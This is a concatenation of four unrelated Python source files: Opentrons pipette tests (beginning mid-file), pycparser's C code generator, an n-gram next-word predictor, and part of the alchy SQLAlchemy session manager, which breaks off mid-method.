name=v13)
left.tip_attached = True
right.tip_attached = True
left.aspirate().dispense()
right.aspirate().dispense()
@pytest.mark.api1_only
def test_pipette_models_reach_max_volume(robot, instruments):
for model in pipette_config.config_models:
config = pipette_config.load(model)
robot.reset()
pipette = instruments._create_pipette_from_config(
config=config,
mount='right',
name=model)
pipette.tip_attached = True
pipette.aspirate(pipette.max_volume)
pos = pose_tracker.absolute(
robot.poses,
pipette.instrument_actuator)
assert pos[0] < pipette.plunger_positions['top']
@pytest.mark.api1_only
def test_flow_rate(robot, instruments):
# Test new flow-rate functionality on all pipettes with different max vols
robot.reset()
p10 = instruments.P10_Single(mount='right')
p10.set_flow_rate(aspirate=10)
ul_per_mm = p10._ul_per_mm(p10.max_volume, 'aspirate')
expected_mm_per_sec = round(10 / ul_per_mm, 6)
assert p10.speeds['aspirate'] == expected_mm_per_sec
p10.set_flow_rate(dispense=20)
ul_per_mm = p10._ul_per_mm(p10.max_volume, 'dispense')
expected_mm_per_sec = round(20 / ul_per_mm, 6)
assert p10.speeds['dispense'] == expected_mm_per_sec
robot.reset()
p50 = instruments.P50_Single(mount='right')
p50.set_flow_rate(aspirate=50)
ul_per_mm = p50._ul_per_mm(p50.max_volume, 'aspirate')
expected_mm_per_sec = round(50 / ul_per_mm, 6)
assert p50.speeds['aspirate'] == expected_mm_per_sec
p50.set_flow_rate(dispense=60)
ul_per_mm = p50._ul_per_mm(p50.max_volume, 'dispense')
expected_mm_per_sec = round(60 / ul_per_mm, 6)
assert p50.speeds['dispense'] == expected_mm_per_sec
robot.reset()
p300 = instruments.P300_Single(mount='right')
p300.set_flow_rate(aspirate=300)
ul_per_mm = p300._ul_per_mm(p300.max_volume, 'aspirate')
expected_mm_per_sec = round(300 / ul_per_mm, 6)
assert p300.speeds['aspirate'] == expected_mm_per_sec
p300.set_flow_rate(dispense=310)
ul_per_mm = p300._ul_per_mm(p300.max_volume, 'dispense')
expected_mm_per_sec = round(310 / ul_per_mm, 6)
assert p300.speeds['dispense'] == expected_mm_per_sec
robot.reset()
p1000 = instruments.P1000_Single(mount='right')
p1000.set_flow_rate(aspirate=1000)
ul_per_mm = p1000._ul_per_mm(p1000.max_volume, 'aspirate')
expected_mm_per_sec = round(1000 / ul_per_mm, 6)
assert p1000.speeds['aspirate'] == expected_mm_per_sec
p1000.set_flow_rate(dispense=1100)
ul_per_mm = p1000._ul_per_mm(p1000.max_volume, 'dispense')
expected_mm_per_sec = round(1100 / ul_per_mm, 6)
assert p1000.speeds['dispense'] == expected_mm_per_sec
@pytest.mark.api1_only
def test_pipette_max_deck_height(robot, instruments):
robot.reset()
tallest_point = robot._driver.homed_position['Z']
p = instruments.P300_Single(mount='left')
assert p._max_deck_height() == tallest_point
# TODO: revise when tip length is on tipracks
for tip_length in [10, 25, 55, 100]:
p._add_tip(length=tip_length)
assert p._max_deck_height() == tallest_point - tip_length
p._remove_tip(length=tip_length)
@pytest.mark.api1_only
def test_retract(robot, instruments):
robot.reset()
plate = containers_load(robot, '96-flat', '1')
p300 = instruments.P300_Single(mount='left')
from opentrons.drivers.smoothie_drivers.driver_3_0 import HOMED_POSITION
p300.move_to(plate[0].top())
assert p300.previous_placeable == plate[0]
current_pos = pose_tracker.absolute(
robot.poses,
p300)
assert current_pos[2] == plate[0].coordinates()[2]
p300.retract()
assert p300.previous_placeable is None
current_pos = pose_tracker.absolute(
robot.poses,
p300.instrument_mover)
assert current_pos[2] == HOMED_POSITION['A']
@pytest.mark.api1_only
@pytest.mark.xfail
def test_aspirate_move_to(old_aspiration, robot, instruments):
# TODO: it seems like this test is checking that the aspirate point is
# TODO: *fully* at the bottom of the well, which isn't the expected
# TODO: behavior of aspirate when a location is not specified. This should
# TODO: be split into two tests--one for this behavior (specifying a place)
# TODO: and another one for the default
robot.reset()
tip_rack = containers_load(robot, 'tiprack-200ul', '3')
p300 = instruments.P300_Single(
mount='left', tip_racks=[tip_rack])
p300.pick_up_tip()
x, y, z = (161.0, 116.7, 0.0)
plate = containers_load(robot, '96-flat', '1')
well = plate[0]
pos = well.from_center(x=0, y=0, z=-1, reference=plate)
location = (plate, pos)
robot.poses = p300._move(robot.poses, x=x, y=y, z=z)
robot.calibrate_container_with_instrument(plate, p300, False)
p300.aspirate(100, location)
current_pos = pose_tracker.absolute(
robot.poses,
p300.instrument_actuator)
assert isclose(current_pos, (6.9, 0.0, 0.0)).all()
current_pos = pose_tracker.absolute(robot.poses, p300)
assert isclose(current_pos, (161, 116.7, 10.5)).all()
@pytest.mark.api1_only
@pytest.mark.xfail
def test_dispense_move_to(old_aspiration, robot, instruments):
# TODO: same as for aspirate
robot.reset()
tip_rack = containers_load(robot, 'tiprack-200ul', '3')
p300 = instruments.P300_Single(
mount='left',
tip_racks=[tip_rack])
x, y, z = (161.0, 116.7, 0.0)
plate = containers_load(robot, '96-flat', '1')
well = plate[0]
pos = well.from_center(x=0, y=0, z=-1, reference=plate)
location = (plate, pos)
robot.poses = p300._move(robot.poses, x=x, y=y, z=z)
robot.calibrate_container_with_instrument(plate, p300, False)
p300.pick_up_tip()
p300.aspirate(100, location)
p300.dispense(100, location)
current_pos = pose_tracker.absolute(
robot.poses,
p300.instrument_actuator)
assert (current_pos == (1.5, 0.0, 0.0)).all()
current_pos = pose_tracker.absolute(robot.poses, p300)
assert isclose(current_pos, (161, 116.7, 10.5)).all()
@pytest.mark.api1_only
def test_trough_move_to(robot, instruments):
# TODO: new labware system should center multichannel pipettes within wells
# TODO: (correct single-channel position currently corresponds to back-
# TODO: most tip of multi-channel), so calculate against that
robot.reset()
tip_rack = containers_load(robot, 'tiprack-200ul', '3')
p300 = instruments.P300_Single(
mount='left',
tip_racks=[tip_rack])
trough = containers_load(robot, 'trough-12row', '1')
p300.pick_up_tip()
p300.move_to(trough)
current_pos = pose_tracker.absolute(robot.poses, p300)
assert isclose(current_pos, (0, 0, 38)).all()
@pytest.mark.api1_only
def test_delay_calls(monkeypatch, instruments, robot):
from opentrons.legacy_api.instruments import pipette
p300 = instruments.P300_Single(mount='right')
cmd = []
def mock_pause():
nonlocal cmd
cmd.append('pause')
def mock_resume():
nonlocal cmd
cmd.append('resume')
def mock_sleep(seconds):
cmd.append("sleep {}".format(seconds))
def mock_is_simulating():
return False
monkeypatch.setattr(robot, 'is_simulating', mock_is_simulating)
monkeypatch.setattr(robot, 'pause', mock_pause)
monkeypatch.setattr(robot, 'resume', mock_resume)
monkeypatch.setattr(pipette, '_sleep', mock_sleep)
p300.delay(seconds=4, minutes=1)
assert 'pause' in cmd
assert 'sleep 64.0' in cmd
assert 'resume' in cmd
@pytest.mark.xfail
def test_drop_tip_in_trash(monkeypatch, instruments, robot, labware):
from opentrons.legacy_api.instruments.pipette import Pipette
robot.home()
tiprack = labware.load('tiprack-200ul', '1')
p300 = instruments.P300_Multi(mount='left', tip_racks=[tiprack])
p300.pick_up_tip()
movelog = []
move_fn = Pipette.move_to
def log_move(self, location, strategy=None):
movelog.append(location)
move_fn(self, location, strategy)
monkeypatch.setattr(Pipette, "move_to", log_move)
p300.drop_tip()
base_obj = movelog[0][0]
y_offset = movelog[0][1][1]
assert base_obj == robot.fixed_trash[0]
assert y_offset == 111.5
|
|
#------------------------------------------------------------------------------
# pycparser: c_generator.py
#
# C code generator from pycparser AST nodes.
#
# Eli Bendersky [http://eli.thegreenplace.net]
# License: BSD
#------------------------------------------------------------------------------
from . import c_ast
class CGenerator(object):
""" Uses the same visitor pattern as c_ast.NodeVisitor, but modified to
return a value from each visit method, using string accumulation in
generic_visit.
"""
def __init__(self):
# Statements start with indentation of self.indent_level spaces, using
# the _make_indent method
#
self.indent_level = 0
def _make_indent(self):
return ' ' * self.indent_level
def visit(self, node):
method = 'visit_' + node.__class__.__name__
return getattr(self, method, self.generic_visit)(node)
def generic_visit(self, node):
#~ print('generic:', type(node))
if node is None:
return ''
else:
return ''.join(self.visit(c) for c_name, c in node.children())
def visit_Constant(self, n):
return n.value
def visit_ID(self, n):
return n.name
def visit_Pragma(self, n):
ret = '#pragma'
if n.string:
ret += ' ' + n.string
return ret
def visit_ArrayRef(self, n):
arrref = self._parenthesize_unless_simple(n.name)
return arrref + '[' + self.visit(n.subscript) + ']'
def visit_StructRef(self, n):
sref = self._parenthesize_unless_simple(n.name)
return sref + n.type + self.visit(n.field)
def visit_FuncCall(self, n):
fref = self._parenthesize_unless_simple(n.name)
return fref + '(' + self.visit(n.args) + ')'
def visit_UnaryOp(self, n):
operand = self._parenthesize_unless_simple(n.expr)
if n.op == 'p++':
return '%s++' % operand
elif n.op == 'p--':
return '%s--' % operand
elif n.op == 'sizeof':
# Always parenthesize the argument of sizeof since it can be
# a name.
return 'sizeof(%s)' % self.visit(n.expr)
else:
return '%s%s' % (n.op, operand)
def visit_BinaryOp(self, n):
lval_str = self._parenthesize_if(n.left,
lambda d: not self._is_simple_node(d))
rval_str = self._parenthesize_if(n.right,
lambda d: not self._is_simple_node(d))
return '%s %s %s' % (lval_str, n.op, rval_str)
def visit_Assignment(self, n):
rval_str = self._parenthesize_if(
n.rvalue,
lambda n: isinstance(n, c_ast.Assignment))
return '%s %s %s' % (self.visit(n.lvalue), n.op, rval_str)
def visit_IdentifierType(self, n):
return ' '.join(n.names)
def _visit_expr(self, n):
if isinstance(n, c_ast.InitList):
return '{' + self.visit(n) + '}'
elif isinstance(n, c_ast.ExprList):
return '(' + self.visit(n) + ')'
else:
return self.visit(n)
def visit_Decl(self, n, no_type=False):
# no_type is used when a Decl is part of a DeclList, where the type is
# explicitly only for the first declaration in a list.
#
s = n.name if no_type else self._generate_decl(n)
if n.bitsize: s += ' : ' + self.visit(n.bitsize)
if n.init:
s += ' = ' + self._visit_expr(n.init)
return s
def visit_DeclList(self, n):
s = self.visit(n.decls[0])
if len(n.decls) > 1:
s += ', ' + ', '.join(self.visit_Decl(decl, no_type=True)
for decl in n.decls[1:])
return s
def visit_Typedef(self, n):
s = ''
if n.storage: s += ' '.join(n.storage) + ' '
s += self._generate_type(n.type)
return s
def visit_Cast(self, n):
s = '(' + self._generate_type(n.to_type) + ')'
return s + ' ' + self._parenthesize_unless_simple(n.expr)
def visit_ExprList(self, n):
visited_subexprs = []
for expr in n.exprs:
visited_subexprs.append(self._visit_expr(expr))
return ', '.join(visited_subexprs)
def visit_InitList(self, n):
visited_subexprs = []
for expr in n.exprs:
visited_subexprs.append(self._visit_expr(expr))
return ', '.join(visited_subexprs)
def visit_Enum(self, n):
s = 'enum'
if n.name: s += ' ' + n.name
if n.values:
s += ' {'
for i, enumerator in enumerate(n.values.enumerators):
s += enumerator.name
if enumerator.value:
s += ' = ' + self.visit(enumerator.value)
if i != len(n.values.enumerators) - 1:
s += ', '
s += '}'
return s
def visit_FuncDef(self, n):
decl = self.visit(n.decl)
self.indent_level = 0
body = self.visit(n.body)
if n.param_decls:
knrdecls = ';\n'.join(self.visit(p) for p in n.param_decls)
return decl + '\n' + knrdecls + ';\n' + body + '\n'
else:
return decl + '\n' + body + '\n'
def visit_FileAST(self, n):
s = ''
for ext in n.ext:
if isinstance(ext, c_ast.FuncDef):
s += self.visit(ext)
elif isinstance(ext, c_ast.Pragma):
s += self.visit(ext) + '\n'
else:
s += self.visit(ext) + ';\n'
return s
def visit_Compound(self, n):
s = self._make_indent() + '{\n'
self.indent_level += 2
if n.block_items:
s += ''.join(self._generate_stmt(stmt) for stmt in n.block_items)
self.indent_level -= 2
s += self._make_indent() + '}\n'
return s
def visit_EmptyStatement(self, n):
return ';'
def visit_ParamList(self, n):
return ', '.join(self.visit(param) for param in n.params)
def visit_Return(self, n):
s = 'return'
if n.expr: s += ' ' + self.visit(n.expr)
return s + ';'
def visit_Break(self, n):
return 'break;'
def visit_Continue(self, n):
return 'continue;'
def visit_TernaryOp(self, n):
s = '(' + self._visit_expr(n.cond) + ') ? '
s += '(' + self._visit_expr(n.iftrue) + ') : '
s += '(' + self._visit_expr(n.iffalse) + ')'
return s
def visit_If(self, n):
s = 'if ('
if n.cond: s += self.visit(n.cond)
s += ')\n'
s += self._generate_stmt(n.iftrue, add_indent=True)
if n.iffalse:
s += self._make_indent() + 'else\n'
s += self._generate_stmt(n.iffalse, add_indent=True)
return s
def visit_For(self, n):
s = 'for ('
if n.init: s += self.visit(n.init)
s += ';'
if n.cond: s += ' ' + self.visit(n.cond)
s += ';'
if n.next: s += ' ' + self.visit(n.next)
s += ')\n'
s += self._generate_stmt(n.stmt, add_indent=True)
return s
def visit_While(self, n):
s = 'while ('
if n.cond: s += self.visit(n.cond)
s += ')\n'
s += self._generate_stmt(n.stmt, add_indent=True)
return s
def visit_DoWhile(self, n):
s = 'do\n'
s += self._generate_stmt(n.stmt, add_indent=True)
s += self._make_indent() + 'while ('
if n.cond: s += self.visit(n.cond)
s += ');'
return s
def visit_Switch(self, n):
s = 'switch (' + self.visit(n.cond) + ')\n'
s += self._generate_stmt(n.stmt, add_indent=True)
return s
def visit_Case(self, n):
s = 'case ' + self.visit(n.expr) + ':\n'
for stmt in n.stmts:
s += self._generate_stmt(stmt, add_indent=True)
return s
def visit_Default(self, n):
s = 'default:\n'
for stmt in n.stmts:
s += self._generate_stmt(stmt, add_indent=True)
return s
def visit_Label(self, n):
return n.name + ':\n' + self._generate_stmt(n.stmt)
def visit_Goto(self, n):
return 'goto ' + n.name + ';'
def visit_EllipsisParam(self, n):
return '...'
def visit_Struct(self, n):
return self._generate_struct_union(n, 'struct')
def visit_Typename(self, n):
return self._generate_type(n.type)
def visit_Union(self, n):
return self._generate_struct_union(n, 'union')
def visit_NamedInitializer(self, n):
s = ''
for name in n.name:
if isinstance(name, c_ast.ID):
s += '.' + name.name
elif isinstance(name, c_ast.Constant):
s += '[' + name.value + ']'
s += ' = ' + self._visit_expr(n.expr)
return s
def visit_FuncDecl(self, n):
return self._generate_type(n)
def _generate_struct_union(self, n, name):
""" Generates code for structs and unions. name should be either
'struct' or 'union'.
"""
s = name + ' ' + (n.name or '')
if n.decls:
s += '\n'
s += self._make_indent()
self.indent_level += 2
s += '{\n'
for decl in n.decls:
s += self._generate_stmt(decl)
self.indent_level -= 2
s += self._make_indent() + '}'
return s
def _generate_stmt(self, n, add_indent=False):
""" Generation from a statement node. This method exists as a wrapper
for individual visit_* methods to handle different treatment of
some statements in this context.
"""
typ = type(n)
if add_indent: self.indent_level += 2
indent = self._make_indent()
if add_indent: self.indent_level -= 2
if typ in (
c_ast.Decl, c_ast.Assignment, c_ast.Cast, c_ast.UnaryOp,
c_ast.BinaryOp, c_ast.TernaryOp, c_ast.FuncCall, c_ast.ArrayRef,
c_ast.StructRef, c_ast.Constant, c_ast.ID, c_ast.Typedef,
c_ast.ExprList):
# These can also appear in an expression context, so their visit
# methods add no semicolon of their own; append one here
#
return indent + self.visit(n) + ';\n'
elif typ in (c_ast.Compound,):
# No extra indentation required before the opening brace of a
# compound - because it consists of multiple lines it has to
# compute its own indentation.
#
return self.visit(n)
else:
return indent + self.visit(n) + '\n'
def _generate_decl(self, n):
""" Generation from a Decl node.
"""
s = ''
if n.funcspec: s = ' '.join(n.funcspec) + ' '
if n.storage: s += ' '.join(n.storage) + ' '
s += self._generate_type(n.type)
return s
def _generate_type(self, n, modifiers=[]):
""" Recursive generation from a type node. n is the type node.
modifiers collects the PtrDecl, ArrayDecl and FuncDecl modifiers
encountered on the way down to a TypeDecl, to allow proper
generation from it.
"""
typ = type(n)
#~ print(n, modifiers)
if typ == c_ast.TypeDecl:
s = ''
if n.quals: s += ' '.join(n.quals) + ' '
s += self.visit(n.type)
nstr = n.declname if n.declname else ''
# Resolve modifiers.
# Wrap in parens to distinguish pointer to array and pointer to
# function syntax.
#
for i, modifier in enumerate(modifiers):
if isinstance(modifier, c_ast.ArrayDecl):
if (i != 0 and isinstance(modifiers[i - 1], c_ast.PtrDecl)):
nstr = '(' + nstr + ')'
nstr += '[' + self.visit(modifier.dim) + ']'
elif isinstance(modifier, c_ast.FuncDecl):
if (i != 0 and isinstance(modifiers[i - 1], c_ast.PtrDecl)):
nstr = '(' + nstr + ')'
nstr += '(' + self.visit(modifier.args) + ')'
elif isinstance(modifier, c_ast.PtrDecl):
if modifier.quals:
nstr = '* %s %s' % (' '.join(modifier.quals), nstr)
else:
nstr = '*' + nstr
if nstr: s += ' ' + nstr
return s
elif typ == c_ast.Decl:
return self._generate_decl(n.type)
elif typ == c_ast.Typename:
return self._generate_type(n.type)
elif typ == c_ast.IdentifierType:
return ' '.join(n.names) + ' '
elif typ in (c_ast.ArrayDecl, c_ast.PtrDecl, c_ast.FuncDecl):
return self._generate_type(n.type, modifiers + [n])
else:
return self.visit(n)
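# Illustration of the parenthesization above (a sketch, assuming typical
# pycparser ASTs): for `int (*p)[5];` the modifiers reaching the TypeDecl
# are [PtrDecl, ArrayDecl]; the PtrDecl is applied first ('*p'), and since
# the ArrayDecl follows a PtrDecl the name is wrapped, yielding '(*p)[5]'
# (pointer to array) rather than '*p[5]' (array of pointers).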
def _parenthesize_if(self, n, condition):
""" Visits 'n' and returns its string representation, parenthesized
if the condition function applied to the node returns True.
"""
s = self._visit_expr(n)
if condition(n):
return '(' + s + ')'
else:
return s
def _parenthesize_unless_simple(self, n):
""" Common use case for _parenthesize_if
"""
return self._parenthesize_if(n, lambda d: not self._is_simple_node(d))
def _is_simple_node(self, n):
""" Returns True for nodes that are "simple" - i.e. nodes that always
have higher precedence than operators.
"""
return isinstance(n, (c_ast.Constant, c_ast.ID, c_ast.ArrayRef,
c_ast.StructRef, c_ast.FuncCall))
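# A minimal round-trip sketch (assuming the full pycparser package is
# importable, so that `pycparser.c_parser.CParser` is available):
if __name__ == '__main__':
    from pycparser import c_parser
    # Parse a small program, then regenerate C source from its AST.
    _ast = c_parser.CParser().parse('int main(void)\n{\n  return 0;\n}\n')
    print(CGenerator().visit(_ast))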
|
|
#TIME COMPLEXITY :
"""
FOR WORD PREDICTION : O(1) (a single dict lookup keyed on the last three words)
FOR WORD PREDICTION WITH 'R'TH RANK : O(R)
ADDED PROBABILITY USING INTERPOLATION
"""
#import the modules necessary
from nltk.util import ngrams
from collections import defaultdict
from collections import OrderedDict
import string
import time
import gc
start_time = time.time()
#returns : int (the total token count of the corpus)
#arg: string,dict,dict,dict,dict
#loads the corpus for the dataset and makes the frequency counts of the bigram, trigram and quadgram strings
def loadCorpus(file_path,tri_dict,quad_dict,vocab_dict,bi_dict):
w1 = '' #for storing the 3rd last word to be used for next token set
w2 = '' #for storing the 2nd last word to be used for next token set
w3 = '' #for storing the last word to be used for next token set
token = []
word_len = 0
#open the corpus file and read it line by line
with open(file_path,'r') as file:
for line in file:
#split the line into tokens
token = line.split()
i = 0
#for each word in the token list, remove punctuation and change to lowercase
for word in token :
for l in word :
if l in string.punctuation:
word = word.replace(l," ")
token[i] = word.lower()
i=i+1
#make the token list into a string
content = " ".join(token)
token = content.split()
word_len = word_len + len(token)
if not token:
continue
#add the last word from previous line
if w3!= '':
token.insert(0,w3)
temp0 = list(ngrams(token,2))
#since we are reading line by line, some combinations of words might get missed for pairing
#for trigram
#first add the previous words
if w2!= '':
token.insert(0,w2)
#tokens for trigrams
temp1 = list(ngrams(token,3))
#insert the 3rd last word from previous line for quadgram pairing
if w1!= '':
token.insert(0,w1)
#add new unique words to the vocabulary dict, or update their frequency count
for word in token:
if word not in vocab_dict:
vocab_dict[word] = 1
else:
vocab_dict[word]+= 1
#tokens for quadgrams
temp2 = list(ngrams(token,4))
#count the frequency of the bigram sentences
for t in temp0:
sen = ' '.join(t)
bi_dict[sen] += 1
#count the frequency of the trigram sentences
for t in temp1:
sen = ' '.join(t)
tri_dict[sen] += 1
#count the frequency of the quadgram sentences
for t in temp2:
sen = ' '.join(t)
quad_dict[sen] += 1
#then take out the last 3 words
n = len(token)
#store the last few words for the next sentence pairing
w1 = token[n -3]
w2 = token[n -2]
w3 = token[n -1]
return word_len
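#illustration (a sketch on made-up input lines): for the two lines
#"the quick brown" and "fox jumps", the carried-over words give the second
#pass the tokens ['the','quick','brown','fox','jumps'], so cross-line
#n-grams such as 'brown fox' and 'the quick brown fox' are still counted,
#which per-line tokenization alone would miss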
####################################################################################
#returns: string
#arg: string
#remove punctuation and make the string lowercase
def removePunctuations(sen):
#split the string into word tokens
temp_l = sen.split()
i = 0
#changes the word to lowercase and removes punctuation from it
for word in temp_l :
for l in word :
if l in string.punctuation:
word = word.replace(l," ")
temp_l[i] = word.lower()
i=i+1
#splitting is done again here because a token like "here---so" becomes
#"here so" after punctuation removal, yielding two separate words
content = " ".join(temp_l)
return content
####################################################################################
#returns: string
#arg: string,dict,int
#does prediction for the sentence
def doPrediction(sen,prob_dict,rank = 1):
if sen in prob_dict:
if rank <= len(prob_dict[sen]):
return prob_dict[sen][rank-1][1]
else:
return prob_dict[sen][0][1]
else:
return "Can't predict"
####################################################################################
#returns: void
#arg: dict,dict,dict,dict,dict,int
#creates dict for storing probable words with their probabilities for a trigram sentence
def createProbableWordDict(bi_dict,tri_dict,quad_dict,prob_dict,vocab_dict,token_len):
for quad_sen in quad_dict:
prob = 0.0
quad_token = quad_sen.split()
tri_sen = ' '.join(quad_token[:3])
tri_count = tri_dict[tri_sen]
if tri_count != 0:
prob = interpolatedProbability(quad_token,token_len, vocab_dict, bi_dict, tri_dict, quad_dict,
l1 = 0.25, l2 = 0.25, l3 = 0.25 , l4 = 0.25)
if tri_sen not in prob_dict:
prob_dict[tri_sen] = []
prob_dict[tri_sen].append([prob,quad_token[-1]])
else:
prob_dict[tri_sen].append([prob,quad_token[-1]])
prob = None
tri_count = None
quad_token = None
tri_sen = None
####################################################################################
#returns: void
#arg: dict
#for writing the probable word dict in text file
def writeProbWords(prob_dict):
with open('probab_dict.txt','w') as file:
for key in prob_dict:
file.write(key+' '+str(prob_dict[key])+'\n')
####################################################################################
#returns: void
#arg: dict
#for sorting the probable words acc. to their probabilities
def sortProbWordDict(prob_dict):
for key in prob_dict:
if len(prob_dict[key])>1:
#sort in place; a bare sorted() call returns a new list and discards it
prob_dict[key].sort(reverse = True)
####################################################################################
#returns: float
#arg: list,int,dict,dict,dict,dict,float,float,float,float
#for calculating the interpolated probablity
def interpolatedProbability(quad_token,token_len, vocab_dict, bi_dict, tri_dict, quad_dict,
l1 = 0.25, l2 = 0.25, l3 = 0.25 , l4 = 0.25):
sen = ' '.join(quad_token)
prob =(
l1*(quad_dict[sen] / tri_dict[' '.join(quad_token[0:3])])
+ l2*(tri_dict[' '.join(quad_token[1:4])] / bi_dict[' '.join(quad_token[1:3])])
+ l3*(bi_dict[' '.join(quad_token[2:4])] / vocab_dict[quad_token[2]])
+ l4*(vocab_dict[quad_token[3]] / token_len)
)
return prob
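#restated, with C() denoting corpus counts, N = token_len and the
#quadgram w1 w2 w3 w4:
# P(w4|w1 w2 w3) = l1*C(w1 w2 w3 w4)/C(w1 w2 w3)
#                + l2*C(w2 w3 w4)/C(w2 w3)
#                + l3*C(w3 w4)/C(w3)
#                + l4*C(w4)/N
#the default weights sum to 1, so the interpolated value remains a valid
#probability estimate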
####################################################################################
#returns: string
#arg: void
#for taking input from user
def takeInput():
cond = False
#take input
while(cond == False):
sen = input('Enter the string\n')
sen = removePunctuations(sen)
temp = sen.split()
if len(temp) < 3:
print("Please enter atleast 3 words !")
else:
cond = True
temp = temp[-3:]
sen = " ".join(temp)
return sen
####################################################################################
def main():
#variable declaration
tri_dict = defaultdict(int) #for keeping count of sentences of three words
quad_dict = defaultdict(int) #for keeping count of sentences of four words
vocab_dict = defaultdict(int) #for storing the different words with their frequencies
prob_dict = OrderedDict() #for storing the probabilities of probable words for a sentence
bi_dict = defaultdict(int)
#load the corpus for the dataset
token_len = loadCorpus('corpusfile.txt',tri_dict,quad_dict,vocab_dict,bi_dict)
print("---Preprocessing Time for Corpus loading: %s seconds ---" % (time.time() - start_time))
start_time1 = time.time()
#creates a dictionary of probable words
createProbableWordDict(bi_dict,tri_dict,quad_dict,prob_dict,vocab_dict,token_len)
#sort the dictionary of probable words
sortProbWordDict(prob_dict)
# writeProbWords(prob_dict)
gc.collect()
print("---Preprocessing Time for Creating Probable Word Dict: %s seconds ---" % (time.time() - start_time1))
sen = takeInput()
start_time2 = time.time()
prediction = doPrediction(sen,prob_dict)
print("Word Prediction:",prediction)
print("---Time for Prediction Operation: %s seconds ---" % (time.time() - start_time2))
if __name__ == '__main__':
main()
|
|
"""Manager class and mixin.
The :class:`Manager` class helps manage a SQLAlchemy database session as well
as provide convenience functions for common operations.
Configuration
-------------
The following configuration values can be passed into a new :class:`Manager`
instance as a ``dict``, ``class``, or ``module``.
=========================== ==================================================
``SQLALCHEMY_DATABASE_URI`` URI used to connect to the database. Defaults to
``sqlite://``.
``SQLALCHEMY_BINDS`` A ``dict`` that maps bind keys to database URIs.
Optionally, in place of a database URI, a
configuration ``dict`` can be used to overrided
connection options.
``SQLALCHEMY_ECHO`` When ``True`` have SQLAlchemy echo all SQL
statements. Defaults to ``False``.
``SQLALCHEMY_POOL_SIZE`` The size of the database pool. Defaults to the
engine's default (usually ``5``).
``SQLALCHEMY_POOL_TIMEOUT`` Specifies the connection timeout for the pool.
Defaults to ``10``.
``SQLALCHEMY_POOL_RECYCLE`` Number of seconds after which a connection is
automatically recycled.
``SQLALCHEMY_MAX_OVERFLOW`` Controls the number of connections that can be
created after the pool has reached its maximum size.
When those additional connections are returned to
the pool, they are disconnected and discarded.
=========================== ==================================================
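Example configuration ``dict`` (an illustrative sketch; the values below
are not defaults of this module)::

    config = {
        'SQLALCHEMY_DATABASE_URI': 'postgresql://localhost/mydb',
        'SQLALCHEMY_ECHO': True,
        'SQLALCHEMY_POOL_SIZE': 10,
    }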
"""
from functools import partial
import sqlalchemy
from sqlalchemy import orm
from sqlalchemy.engine.url import make_url
from sqlalchemy.orm.exc import UnmappedError
from .model import make_declarative_base, extend_declarative_base
from .query import QueryModel
from .session import Session
from ._compat import string_types, itervalues
__all__ = [
'ManagerMixin',
'Manager',
'Config',
]
class ManagerMixin(object):
"""Extensions for :attr:`Manager.session`."""
def add(self, *instances):
"""Override ``session.add()`` so it can function like
``session.add_all()``.
Note:
Supports chaining.
"""
for instance in instances:
if isinstance(instance, list):
self.add(*instance)
else:
self.session.add(instance)
return self.session
def add_commit(self, *instances):
"""Add instances to session and commit in one call."""
self.add(*instances).commit()
def delete(self, *instances):
"""Override ``session.delete()`` so it can function like
``session.add_all()``.
Note:
Supports chaining.
"""
for instance in instances:
if isinstance(instance, list):
self.delete(*instance)
else:
self.session.delete(instance)
return self.session
def delete_commit(self, *instances):
"""Delete instances to session and commit in one call."""
self.delete(*instances).commit()
class Manager(ManagerMixin):
"""Manager class for database session.
Initialization of :class:`Manager` accepts a config object, session
options, and an optional declarative base. If ``Model`` isn't provided,
then a default one is generated using
:func:`alchy.model.make_declarative_base`. The declarative base model is
accessible at :attr:`Model`.
By default the ``session_options`` are::
{
'query_cls': alchy.Query,
'autocommit': False,
'autoflush': True
}
The default :attr:`session_class` is :class:`alchy.Session`. If you want to
provide your own session class, then it's suggested that you subclass
:class:`alchy.Session` and pass it in via :attr:`session_class`. This way
your subclass will inherit the functionality of :class:`alchy.Session`.
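A minimal usage sketch (assuming a declarative model ``User`` has been
defined on :attr:`Model`)::

    db = Manager(config={'SQLALCHEMY_DATABASE_URI': 'sqlite://'})
    db.create_all()
    db.add_commit(User(name='alice'))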
"""
def __init__(self,
config=None,
session_options=None,
Model=None,
session_class=None):
#: Database engine configuration options.
self.config = Config(defaults={
'SQLALCHEMY_DATABASE_URI': 'sqlite://',
'SQLALCHEMY_BINDS': None,
'SQLALCHEMY_ECHO': False,
'SQLALCHEMY_POOL_SIZE': None,
'SQLALCHEMY_POOL_TIMEOUT': None,
'SQLALCHEMY_POOL_RECYCLE': None,
'SQLALCHEMY_MAX_OVERFLOW': None
})
if isinstance(config, dict):
self.config.update(config)
elif config is not None:
self.config.from_object(config)
self._engines = {}
self._binds = {}
if session_options is None:
session_options = {}
session_options.setdefault('query_cls', QueryModel)
session_options.setdefault('autocommit', False)
session_options.setdefault('autoflush', True)
#: Class to use for the session object.
self.session_class = session_class or Session
#: Scoped session object.
self.session = self.create_scoped_session(session_options)
if Model is None:
#: Declarative base model class.
self.Model = make_declarative_base()
else:
self.Model = Model
if self.Model:
extend_declarative_base(self.Model, self.session)
@property
def metadata(self):
"""Return :attr:`Model` metadata object."""
return getattr(self.Model, 'metadata', None)
@property
def binds(self):
"""Returns config options for all binds."""
if not self._binds:
self._binds = {
None: self.config['SQLALCHEMY_DATABASE_URI']
}
if self.config['SQLALCHEMY_BINDS']:
self._binds.update(self.config['SQLALCHEMY_BINDS'])
return self._binds
@property
def binds_map(self):
"""Returns a dictionary with a table->engine mapping. This is suitable
for use in ``sessionmaker(binds=binds_map)``.
"""
binds = list(self.binds)
retval = {}
for bind in binds:
engine = self.get_engine(bind)
tables = self.get_tables_for_bind(bind)
retval.update(dict((table, engine) for table in tables))
return retval
@property
def engine(self):
"""Return default database engine."""
return self.get_engine()
def create_engine(self, uri_or_config):
"""Create engine using either a URI or a config dict. If URI supplied,
then the default :attr:`config` will be used. If config supplied, then
URI in config will be used.
"""
if isinstance(uri_or_config, dict):
uri = uri_or_config['SQLALCHEMY_DATABASE_URI']
config = uri_or_config
else:
uri = uri_or_config
config = self.config
options = engine_options_from_config(config)
return sqlalchemy.create_engine(make_url(uri), **options)
def get_engine(self, bind=None):
"""Return engine associated with bind. Create engine if it doesn't
already exist.
"""
if bind not in self._engines:
assert bind in self.binds, (
'Bind {0} is not specified. '
'Set in SQLALCHEMY_BINDS configuration variable'.format(bind))
self._engines[bind] = self.create_engine(self.binds[bind])
return self._engines[bind]
def create_scoped_session(self, options=None):
"""Create scoped session which internally calls :meth:`create_session`.
"""
if options is None: # pragma: no cover
options = {}
